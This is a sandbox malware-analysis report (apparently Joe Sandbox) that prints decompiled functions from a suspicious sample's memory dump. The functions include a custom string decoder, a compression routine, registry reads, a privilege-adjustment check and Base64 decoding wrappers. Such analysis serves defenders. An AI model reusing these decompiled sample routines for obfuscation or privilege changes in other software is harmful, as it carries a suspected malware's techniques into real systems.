				intOrPtr _t81;
				char _t82;
				void* _t83;
				int _t84;
				signed int _t85;
				void* _t88;
				signed int _t89;
				intOrPtr* _t91;
				intOrPtr _t92;
				signed int _t94;
				signed char _t98;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				signed int* _t128;
				signed int _t129;
				signed int* _t130;
				signed int _t131;
				signed int* _t132;
				signed int _t133;
				signed int* _t134;
				signed int _t135;

				_push(_t87);
				_t53 = _a8;
				_t88 = _t53 + 1;
				do {
					_t92 =  *_t53;
					_t53 = _t53 + 1;
				} while (_t92 != 0);
				_t84 = _t53 - _t88;
				_t123 = _t84 * 5;
				_v12 = _t123;
				_t119 =  *0x3b8538(_t84, _t118, _t121, _t83);
				memset(_t119, 0, _t84);
				_v8 = _v8 & 0x00000000;
				if(_t84 == 0) {
					L14:
					_t89 = 0;
					_t85 = 0;
					if(_t123 == 0) {
						L29:
						_t124 = _t89;
						L22:
						 *0x3b8540(_t119);
						return _t124;
					} else {
						goto L15;
					}
					do {
						L15:
						_t126 = 0x28;
						_t94 = _t85 % _t126;
						if(_t94 == 0) {
							_t127 = 5;
							_t128 = _t119 + _t85 / _t127;
							_t64 = _t128[0] >> 2;
							_t98 =  *_t128 << 3;
							L27:
							 *((char*)(_t89 + _a4)) = _t64 + _t98;
							goto L28;
						}
						if(_t94 == 8) {
							_t129 = 5;
							_t130 = _t119 + _t85 / _t129;
							_t64 = ( *_t130 << 5) + _t130[0] + ( *_t130 << 5) + _t130[0];
							_t98 = _t130[0] >> 4;
							goto L27;
						}
						if(_t94 == 0x10) {
							_t131 = 5;
							_t132 = _t119 + _t85 / _t131;
							_t64 = _t132[0] >> 1;
							_t98 =  *_t132 << 4;
							goto L27;
						}
						if(_t94 == 0x18) {
							_t133 = 5;
							_t134 = _t119 + _t85 / _t133;
							_t64 = (_t134[0] >> 3) + (_t134[0] << 2);
							_t98 =  *_t134 << 7;
							goto L27;
						}
						if(_t94 == 0x20) {
							_t135 = 5;
							 *((char*)(_t89 + _a4)) = ( *(_t119 + _t85 / _t135) << 5) +  *((intOrPtr*)(_t85 / _t135 + _t119 + 1));
						}
						L28:
						_t85 = _t85 + 8;
						_t89 = _t89 + 1;
					} while (_t85 < _v12);
					goto L29;
				}
				_t91 = _a8;
				_t117 = _t119 - _t91;
				do {
					_t81 =  *_t91;
					if(_t81 <= 0x60 || _t81 >= 0x7b) {
						if(_t81 <= 0x31 || _t81 >= 0x38) {
							if(_t81 <= 0x40 || _t81 >= 0x5b) {
								_t124 = 0;
								goto L22;
							} else {
								_t82 = _t81 - 0x41;
								goto L13;
							}
						} else {
							_t82 = _t81 - 0x18;
							goto L13;
						}
					} else {
						_t82 = _t81 - 0x61;
					}
					L13:
					_v8 = _v8 + 1;
					 *((char*)(_t117 + _t91)) = _t82;
					_t91 = _t91 + 1;
				} while (_v8 < _t84);
				goto L14;
			}


































    0x003a39c4
    0x003a39c5
    0x003a39c8
    0x003a39cb
    0x003a39cb
    0x003a39cd
    0x003a39ce
    0x003a39d6
    0x003a39da
    0x003a39df
    0x003a39e9
    0x003a39ee
    0x003a39f3
    0x003a39fc
    0x003a3a35
    0x003a3a35
    0x003a3a37
    0x003a3a3b
    0x003a3b1c
    0x003a3b1c
    0x003a3a8a
    0x003a3a8b
    0x003a3a98
    0x00000000
    0x00000000
    0x00000000
    0x003a3a41
    0x003a3a41
    0x003a3a47
    0x003a3a48
    0x003a3a4c
    0x003a3af4
    0x003a3af9
    0x003a3b01
    0x003a3b04
    0x003a3b07
    0x003a3b0c
    0x00000000
    0x003a3b0c
    0x003a3a55
    0x003a3ad6
    0x003a3adb
    0x003a3ae9
    0x003a3aeb
    0x00000000
    0x003a3aeb
    0x003a3a5a
    0x003a3abe
    0x003a3ac3
    0x003a3acb
    0x003a3acd
    0x00000000
    0x003a3acd
    0x003a3a5f
    0x003a3a9d
    0x003a3aa2
    0x003a3ab1
    0x003a3ab5
    0x00000000
    0x003a3ab5
    0x003a3a64
    0x003a3a70
    0x003a3a80
    0x003a3a80
    0x003a3b0f
    0x003a3b0f
    0x003a3b12
    0x003a3b13
    0x00000000
    0x003a3a41
    0x003a39fe
    0x003a3a03
    0x003a3a05
    0x003a3a05
    0x003a3a09
    0x003a3a15
    0x003a3a21
    0x003a3a88
    0x00000000
    0x003a3a27
    0x003a3a27
    0x00000000
    0x003a3a27
    0x003a3a1b
    0x003a3a1b
    0x00000000
    0x003a3a1b
    0x003a3a0f
    0x003a3a0f
    0x003a3a0f
    0x003a3a29
    0x003a3a29
    0x003a3a2c
    0x003a3a2f
    0x003a3a30
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A1FE0, Relevance: 2.8, APIs: 2, Instructions: 274Crypto
    C-Code - Quality: 100%
    			E003A1FE0(void* __eax, signed char* _a4, void* _a8, intOrPtr* _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed char* _v12;
				unsigned int _v16;
				intOrPtr _v20;
				void _v24;
				int _v28;
				signed char _v32;
				signed int _t98;
				signed char _t105;
				void* _t108;
				signed char _t109;
				signed char _t121;
				signed char _t122;
				intOrPtr _t123;
				unsigned int _t124;
				unsigned int _t125;
				signed char _t127;
				signed char _t132;
				unsigned int _t135;
				int _t139;
				signed int _t141;
				unsigned int _t143;
				signed char* _t145;
				signed char* _t146;
				void* _t148;
				void _t149;
				signed char** _t157;
				unsigned int _t159;
				unsigned int _t160;
				unsigned int _t162;
				signed char _t164;
				signed char _t165;
				signed char _t166;
				void _t168;
				intOrPtr _t171;
				intOrPtr _t174;
				unsigned int _t176;
				unsigned int _t177;
				signed char* _t179;
				int _t189;
				int _t193;
				unsigned int _t195;
				signed char* _t196;
				signed char* _t197;
				signed char* _t198;
				void* _t199;
				char* _t201;
				void* _t202;

				_t199 = _a8;
				_t196 = _a4;
				_v12 = _t196;
				_v20 = _t196 + __eax;
				_t197 = _t196 + 4;
				do {
					_t174 = _a16;
					_t98 = ((((_t197[3] & 0x000000ff) << 0x00000006 ^ _t197[2] & 0x000000ff) << 0x00000005 ^ _t197[1] & 0x000000ff) << 0x00000005 ^  *_t197 & 0x000000ff) + (((((_t197[3] & 0x000000ff) << 0x00000006 ^ _t197[2] & 0x000000ff) << 0x00000005 ^ _t197[1] & 0x000000ff) << 0x00000005 ^  *_t197 & 0x000000ff) << 0x00000005) >> 0x00000005 & 0x00003fff;
					_t145 =  *(_t174 + _t98 * 4);
					_t157 = _t174 + _t98 * 4;
					if(_t145 < _a4) {
						L49:
						 *_t157 = _t197;
						_t197 =  &(_t197[1]);
						goto L50;
					}
					_t176 = _t197 - _t145;
					_v8 = _t176;
					_t177 = _t176 - 1;
					_v24 = _t197;
					_v16 = _t177;
					if(_t177 > 0xbffe) {
						goto L49;
					}
					if(_v8 <= 0x800 || _t145[3] == _t197[3]) {
						L9:
						if( *_t145 !=  *_t197 || _t145[2] != _t197[2]) {
							goto L49;
						} else {
							_t179 = _v12;
							_t105 = _t197 - _t179;
							 *_t157 = _t197;
							if(_t105 <= 0) {
								L23:
								_t198 =  &(_t197[4]);
								if(_t145[3] != _t197[3]) {
									L43:
									_t159 = _v8;
									_t197 = _t198 - 1;
									_t108 = _t197 - _t179;
									if(_t159 > 0x800) {
										_t109 = _t108 - 2;
										if(_t159 > 0x4000) {
											_t160 = _t159 - 0x4000;
											 *_t199 = _t160 >> 0x0000000b & 0x00000008 | _t109 | 0x00000010;
										} else {
											_t160 = _v16;
											_v8 = _t160;
											 *_t199 = _t109 | 0x00000020;
										}
										L48:
										_t201 = _t199 + 1;
										 *_t201 = _t160 + _t160 + _t160 + _t160;
										 *((char*)(_t201 + 1)) = _t160 >> 6;
										_t199 = _t201 + 2;
										_v12 = _t197;
										goto L50;
									}
									_t162 = _v16;
									 *_t199 = (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007);
									 *(_t199 + 1) = _t162 >> 3;
									_t199 = _t199 + 2;
									_v12 = _t197;
									goto L50;
								}
								_t164 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[4] != _t164) {
									goto L43;
								}
								_t121 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[5] != _t121) {
									goto L43;
								}
								_t165 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[6] != _t165) {
									goto L43;
								}
								_t122 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[7] != _t122) {
									goto L43;
								}
								_t166 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[8] != _t166) {
									goto L43;
								}
								_t123 = _v20;
								_t146 =  &(_t145[9]);
								if(_t198 >= _t123) {
									L32:
									_t124 = _v8;
									_t148 = _t198 - _v12;
									if(_t124 > 0x4000) {
										_t125 = _t124 - 0x4000;
										_v8 = _t125;
										_t127 = _t125 >> 0x0000000b & 0x00000008;
										if(_t148 > 9) {
											_t149 = _t148 - 9;
											 *_t199 = _t127 | 0x00000010;
											L39:
											_t199 = _t199 + 1;
											if(_t149 <= 0xff) {
												L42:
												_t160 = _v8;
												 *_t199 = _t149;
												goto L48;
											}
											_t67 = _t149 - 0x100; // -285
											_t189 = (0x80808081 * _t67 >> 0x20 >> 7) + 1;
											_v32 = _t189;
											memset(_t199, 0, _t189);
											_t132 = _v32;
											_t202 = _t202 + 0xc;
											_t199 = _t199 + _t132;
											do {
												_t149 = _t149 - 0xff;
												_t132 = _t132 - 1;
											} while (_t132 != 0);
											goto L42;
										}
										_t160 = _v8;
										 *_t199 = _t127 | _t148 - 0x00000002 | 0x00000010;
										goto L48;
									}
									_t135 = _v16;
									_v8 = _t135;
									if(_t148 > 0x21) {
										_t149 = _t148 - 0x21;
										 *_t199 = 0x20;
										goto L39;
									}
									 *_t199 = _t148 - 0x00000002 | 0x00000020;
									_t160 = _t135;
									goto L48;
								}
								while( *_t146 ==  *_t198) {
									_t198 =  &(_t198[1]);
									_t146 =  &(_t146[1]);
									if(_t198 < _t123) {
										continue;
									}
									goto L32;
								}
								goto L32;
							}
							_v32 = _t105;
							if(_t105 > 3) {
								if(_t105 > 0x12) {
									_t39 = _t105 - 0x12; // -18
									_t168 = _t39;
									 *_t199 = 0;
									_t199 = _t199 + 1;
									_v24 = _t168;
									if(_t168 <= 0xff) {
										L20:
										 *_t199 = _t168;
										_t199 = _t199 + 1;
										do {
											L21:
											 *_t199 =  *_t179;
											_t199 = _t199 + 1;
											_t179 = _t179 + 1;
											_t105 = _t105 - 1;
										} while (_t105 != 0);
										_v12 = _t179;
										goto L23;
									}
									_t193 = (0x80808081 * (_t168 + 0xffffff00) >> 0x20 >> 7) + 1;
									_v28 = _t193;
									memset(_t199, 0, _t193);
									_t139 = _v28;
									_t202 = _t202 + 0xc;
									_t199 = _t199 + _t139;
									do {
										_v24 = _v24 - 0xff;
										_t139 = _t139 - 1;
									} while (_t139 != 0);
									_t179 = _v12;
									_t168 = _v24;
									_t105 = _v32;
									goto L20;
								}
								_t38 = _t105 - 3; // -3
								_t168 = _t38;
								goto L20;
							}
							 *(_t199 - 2) =  *(_t199 - 2) | _t105;
							goto L21;
						}
					} else {
						_t171 = _a16;
						_t141 = _t98 & 0x000007ff ^ 0x0000201f;
						_t145 =  *(_t171 + _t141 * 4);
						_t157 = _t171 + _t141 * 4;
						if(_t145 < _a4) {
							goto L49;
						}
						_t143 = _t197 - _t145;
						_t27 = _t143 - 1; // -1
						_t195 = _t27;
						_v8 = _t143;
						_v16 = _t195;
						if(_t195 > 0xbffe || _t143 > 0x800 && _t145[3] != _t197[3]) {
							goto L49;
						} else {
							goto L9;
						}
					}
					L50:
				} while (_t197 < _v20 + 0xfffffff3);
				 *_a12 = _t199 - _a8;
				return _v20 - _v12;
			}



















































    0x003a1fe8
    0x003a1fec
    0x003a1ff2
    0x003a1ff5
    0x003a1ff8
    0x003a2000
    0x003a201e
    0x003a202b
    0x003a2030
    0x003a2033
    0x003a2039
    0x003a22be
    0x003a22be
    0x003a22c0
    0x00000000
    0x003a22c0
    0x003a2041
    0x003a2043
    0x003a2046
    0x003a2047
    0x003a204a
    0x003a2053
    0x00000000
    0x00000000
    0x003a2060
    0x003a20b2
    0x003a20b8
    0x00000000
    0x003a20ca
    0x003a20ca
    0x003a20cf
    0x003a20d1
    0x003a20d5
    0x003a214c
    0x003a214f
    0x003a2155
    0x003a2246
    0x003a2246
    0x003a2249
    0x003a224c
    0x003a2254
    0x003a227c
    0x003a2284
    0x003a2292
    0x003a22a5
    0x003a2286
    0x003a2286
    0x003a228b
    0x003a228e
    0x003a228e
    0x003a22a7
    0x003a22ab
    0x003a22b1
    0x003a22b3
    0x003a22b6
    0x003a22b9
    0x00000000
    0x003a22b9
    0x003a2256
    0x003a226f
    0x003a2271
    0x003a2274
    0x003a2277
    0x00000000
    0x003a2277
    0x003a215b
    0x003a215d
    0x003a2161
    0x00000000
    0x00000000
    0x003a2167
    0x003a2169
    0x003a216d
    0x00000000
    0x00000000
    0x003a2173
    0x003a2175
    0x003a2179
    0x00000000
    0x00000000
    0x003a217f
    0x003a2181
    0x003a2185
    0x00000000
    0x00000000
    0x003a218b
    0x003a218d
    0x003a2191
    0x00000000
    0x00000000
    0x003a2197
    0x003a219a
    0x003a219f
    0x003a21ad
    0x003a21ad
    0x003a21b2
    0x003a21ba
    0x003a21de
    0x003a21e3
    0x003a21e9
    0x003a21ee
    0x003a2201
    0x003a2206
    0x003a2208
    0x003a2208
    0x003a220f
    0x003a223f
    0x003a223f
    0x003a2242
    0x00000000
    0x003a2242
    0x003a2211
    0x003a2221
    0x003a2226
    0x003a2229
    0x003a222e
    0x003a2231
    0x003a2234
    0x003a2236
    0x003a2236
    0x003a223c
    0x003a223c
    0x00000000
    0x003a2236
    0x003a21f0
    0x003a21fa
    0x00000000
    0x003a21fa
    0x003a21bc
    0x003a21bf
    0x003a21c5
    0x003a21d6
    0x003a21d9
    0x00000000
    0x003a21d9
    0x003a21cd
    0x003a21cf
    0x00000000
    0x003a21cf
    0x003a21a1
    0x003a21a7
    0x003a21a8
    0x003a21ab
    0x00000000
    0x00000000
    0x00000000
    0x003a21ab
    0x00000000
    0x003a21a1
    0x003a20d7
    0x003a20dd
    0x003a20e7
    0x003a20ee
    0x003a20ee
    0x003a20f1
    0x003a20f4
    0x003a20f5
    0x003a20fe
    0x003a2138
    0x003a2138
    0x003a213a
    0x003a2140
    0x003a2140
    0x003a2142
    0x003a2144
    0x003a2145
    0x003a2146
    0x003a2146
    0x003a2149
    0x00000000
    0x003a2149
    0x003a2110
    0x003a2115
    0x003a2118
    0x003a211d
    0x003a2120
    0x003a2123
    0x003a2125
    0x003a2125
    0x003a212c
    0x003a212c
    0x003a212f
    0x003a2132
    0x003a2135
    0x00000000
    0x003a2135
    0x003a20e9
    0x003a20e9
    0x00000000
    0x003a20e9
    0x003a20df
    0x00000000
    0x003a20df
    0x003a206a
    0x003a206a
    0x003a2072
    0x003a2077
    0x003a207a
    0x003a2080
    0x00000000
    0x00000000
    0x003a2088
    0x003a208a
    0x003a208a
    0x003a208d
    0x003a2090
    0x003a2099
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2099
    0x003a22c1
    0x003a22c7
    0x003a22dc
    0x003a22e3

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039BA40, Relevance: 2.6, Strings: 2, Instructions: 72
    C-Code - Quality: 67%
    			E0039BA40(void* __ecx, intOrPtr _a4, char _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				void* _t15;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t42;

				_t24 = _a4;
				_t3 =  &_a8; // 0x3a094a
				_t37 =  *_t3;
				 *_a16 = 0;
				_t33 =  *0x3b8628; // 0x593938
				_v8 = 0;
				_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x1cc))))(_t24, _t37, 1, 0,  &_v8, 0, 0, _t36, _t23, __ecx);
				if(_t15 != 0) {
					_t42 = E003A1D90(_v8, 0);
					if(_t42 == 0) {
						L5:
						return 0;
					} else {
						_t18 =  *0x3b8628; // 0x593938
						_push(0);
						_push(0);
						_push( &_v8);
						_push(_t42);
						_push(7);
						_push(_t37);
						_push(_t24);
						if( *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x1cc))))() != 0) {
							 *_a12 = _t42;
							 *_a16 = _v8;
							return 1;
						} else {
							E0039BB40(_t42);
							goto L5;
						}
					}
				} else {
					return _t15;
				}
			}












    0x0039ba48
    0x0039ba4c
    0x0039ba4c
    0x0039ba5b
    0x0039ba61
    0x0039ba68
    0x0039ba76
    0x0039ba7a
    0x0039ba90
    0x0039ba97
    0x0039bac0
    0x0039bac8
    0x0039ba99
    0x0039ba99
    0x0039baa4
    0x0039baa6
    0x0039baab
    0x0039baac
    0x0039baad
    0x0039baaf
    0x0039bab0
    0x0039bab5
    0x0039bad4
    0x0039bad8
    0x0039bae3
    0x0039bab7
    0x0039bab8
    0x00000000
    0x0039babd
    0x0039bab5
    0x0039ba7c
    0x0039ba81
    0x0039ba81

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B1FF0, Relevance: 2.6, Strings: 2, Instructions: 52
    C-Code - Quality: 48%
    			E003B1FF0(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t33;

				_t31 =  *0x3b8628; // 0x593938
				_push( &_v12);
				_push(0);
				if( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x188))))() != 0) {
					_push(0);
					_push(0);
					_push(0x10);
					_push( &_v28);
					asm("sbb esi, esi");
					_v24 = _v12;
					_v20 = _v8;
					_t33 =  *0x3b8628; // 0x593938
					_push(0);
					_v28 = 1;
					_v16 =  ~__eax & 0x00000002;
					_push(_a4);
					if( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x18c))))() == 0) {
						goto L1;
					} else {
						_t28 =  *0x3b8628; // 0x593938
						return 0 |  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x30))))() != 0x00000514;
					}
				} else {
					L1:
					return 0;
				}
			}












    0x003b1ff3
    0x003b2002
    0x003b200a
    0x003b2010
    0x003b201f
    0x003b2021
    0x003b2023
    0x003b202a
    0x003b202b
    0x003b202d
    0x003b2033
    0x003b2036
    0x003b203f
    0x003b2041
    0x003b2048
    0x003b2051
    0x003b2056
    0x00000000
    0x003b2058
    0x003b2058
    0x003b2073
    0x003b2073
    0x003b2012
    0x003b2012
    0x003b2018
    0x003b2018

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A5853, Relevance: 1.5, APIs: 1, Instructions: 28encryption
    C-Code - Quality: 86%
    			E003A5853(void* __ecx, char* _a4, BYTE* _a8) {
				int _v8;
				intOrPtr* _t8;
				signed int _t10;
				intOrPtr _t15;
				void* _t18;

				_t8 = _a4;
				_v8 = 0x400;
				_t18 = _t8 + 1;
				do {
					_t15 =  *_t8;
					_t8 = _t8 + 1;
				} while (_t15 != 0);
				_t10 = CryptStringToBinaryA(_a4, _t8 - _t18, 0, _a8,  &_v8, 0, 0);
				asm("sbb eax, eax");
				return  ~_t10 & _v8;
			}








    0x003a5857
    0x003a585b
    0x003a5862
    0x003a5867
    0x003a5867
    0x003a5869
    0x003a586a
    0x003a587e
    0x003a5886
    0x003a588d

    APIs
    • CryptStringToBinaryA.CRYPT32(?,?,00000000,?,00000400,00000000,00000000), ref: 003A587E
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A3933, Relevance: 1.5, APIs: 1, Instructions: 25encryption
    C-Code - Quality: 87%
    			E003A3933(int __eax, void* __ecx, char* _a4, BYTE* _a8) {
				int _v8;
				intOrPtr* _t9;
				signed int _t11;
				void* _t15;
				intOrPtr _t17;

				_v8 = __eax;
				_t9 = _a4;
				_t3 = _t9 + 1; // 0x1
				_t15 = _t3;
				do {
					_t17 =  *_t9;
					_t9 = _t9 + 1;
				} while (_t17 != 0);
				_t11 = CryptStringToBinaryA(_a4, _t9 - _t15, 1, _a8,  &_v8, 0, 0);
				asm("sbb eax, eax");
				return  ~_t11 & _v8;
			}








    0x003a3937
    0x003a393a
    0x003a393d
    0x003a393d
    0x003a3940
    0x003a3940
    0x003a3942
    0x003a3943
    0x003a395a
    0x003a3962
    0x003a3968

    APIs
    • CryptStringToBinaryA.CRYPT32(00000000,00000001,00000001,00000000,?,00000000,00000000), ref: 003A395A
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F310, Relevance: 1.3, Strings: 1, Instructions: 80
    C-Code - Quality: 81%
    			E0039F310(intOrPtr _a4, char _a8, signed short** _a12, signed short** _a16) {
				intOrPtr _t16;
				void* _t17;
				signed short* _t23;
				intOrPtr _t28;
				signed short* _t32;
				intOrPtr _t36;
				signed int _t38;
				char _t40;
				signed short* _t42;

				_t28 = _a4;
				_t40 = _a8;
				 *_a12 = 0;
				 *_a16 = 0;
				_t16 =  *0x3b8628; // 0x593938
				_t17 =  *((intOrPtr*)( *((intOrPtr*)(_t16 + 0x1d0))))(_t28, _t40, 1, 0,  &_a8);
				if(_t17 != 0) {
					_t42 = E003A1D90(_a8 + _a8, 0);
					if(_t42 == 0) {
						L5:
						return 0;
					} else {
						_t36 =  *0x3b8628; // 0x593938
						_push( &_a8);
						_push(_t42);
						_push(0x80000001);
						_push(_t40);
						_push(_t28);
						if( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x1d0))))() != 0) {
							_t23 = _t42;
							_t32 = _t42;
							do {
								if( *_t23 == 0xa) {
									_t23 =  &(_t23[1]);
								}
								 *_t32 =  *_t23 & 0x0000ffff;
								_t38 =  *_t23 & 0x0000ffff;
								_t32 =  &(_t32[1]);
								_t23 =  &(_t23[1]);
							} while (_t38 != 0);
							 *_a12 = _t42;
							 *_a16 = _a8 + _a8;
							return 1;
						} else {
							E0039BB40(_t42);
							goto L5;
						}
					}
				} else {
					return _t17;
				}
			}












    0x0039f31a
    0x0039f31e
    0x0039f327
    0x0039f32f
    0x0039f335
    0x0039f342
    0x0039f346
    0x0039f35d
    0x0039f364
    0x0039f38d
    0x0039f393
    0x0039f366
    0x0039f366
    0x0039f375
    0x0039f376
    0x0039f377
    0x0039f37c
    0x0039f37d
    0x0039f382
    0x0039f396
    0x0039f398
    0x0039f3a0
    0x0039f3a4
    0x0039f3a6
    0x0039f3a6
    0x0039f3ac
    0x0039f3af
    0x0039f3b2
    0x0039f3b5
    0x0039f3b8
    0x0039f3c3
    0x0039f3cd
    0x0039f3d6
    0x0039f384
    0x0039f385
    0x00000000
    0x0039f38a
    0x0039f382
    0x0039f34b
    0x0039f34b
    0x0039f34b

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AE04D, Relevance: .8, Instructions: 762Crypto
    C-Code - Quality: 100%
    			E003AE04D(void* __eax, signed int __ebx, signed int __edx, intOrPtr* __esi) {
				void* _t410;
				void* _t412;
				signed int _t413;
				signed int _t420;
				signed int _t424;
				signed int _t426;
				signed int _t427;
				void* _t428;
				signed int _t430;
				signed int _t431;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t440;
				signed int _t445;
				signed int _t455;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				void* _t460;
				void* _t465;
				signed int _t466;
				signed int _t467;
				intOrPtr _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t478;
				signed int* _t479;
				signed int _t481;
				unsigned int _t483;
				unsigned int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				intOrPtr _t489;
				signed int _t491;
				signed int _t492;
				signed int _t495;
				signed int _t497;
				signed int _t498;
				intOrPtr _t503;
				signed int _t504;
				signed int _t506;
				signed int _t507;
				signed int _t517;
				signed int* _t518;
				signed int _t520;
				unsigned int _t522;
				unsigned int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				intOrPtr _t528;
				signed int _t530;
				signed int _t531;
				signed int _t534;
				signed int _t536;
				signed int _t537;
				intOrPtr _t542;
				signed int _t543;
				signed int _t545;
				signed int _t546;
				signed int _t558;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				void* _t564;
				void* _t568;
				signed int _t571;
				intOrPtr* _t573;
				signed int _t574;
				void* _t575;
				signed int _t579;
				signed int _t582;
				signed int _t585;
				signed int* _t586;
				signed int _t588;
				signed int _t589;
				unsigned int _t597;
				signed int _t598;
				intOrPtr _t599;
				signed int _t610;
				signed int _t618;
				signed int* _t619;
				signed int _t621;
				signed int _t622;
				unsigned int _t630;
				signed int _t631;
				intOrPtr _t632;
				signed int _t643;
				signed int _t667;
				signed int _t668;
				signed int _t669;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				void* _t691;
				signed int _t695;
				signed int _t697;
				signed int _t698;
				void* _t700;
				signed int _t701;
				signed int _t704;
				signed int _t707;
				intOrPtr _t708;
				intOrPtr _t709;
				signed int _t712;
				signed int _t714;
				signed int _t718;
				intOrPtr _t721;
				signed int _t724;
				signed int _t726;
				signed int _t730;
				intOrPtr* _t734;
				signed int _t736;
				signed int _t737;
				signed int _t741;
				signed int _t742;
				intOrPtr _t745;
				signed int _t747;
				signed int _t751;
				void* _t755;
				void* _t757;
				void* _t758;
				void* _t760;
				void* _t761;

				_t734 = __esi;
				_t758 = _t757 + 0xc;
				if(__eax == 0) {
					L102:
					E003AA6BB( *((intOrPtr*)(_t755 + 0x10)));
					return  *(_t755 - 0x38);
				}
				_t410 = E003AA920(__edx,  *(_t755 - 4),  *(_t755 - 4), 0x20);
				_t760 = _t758 + 0xc;
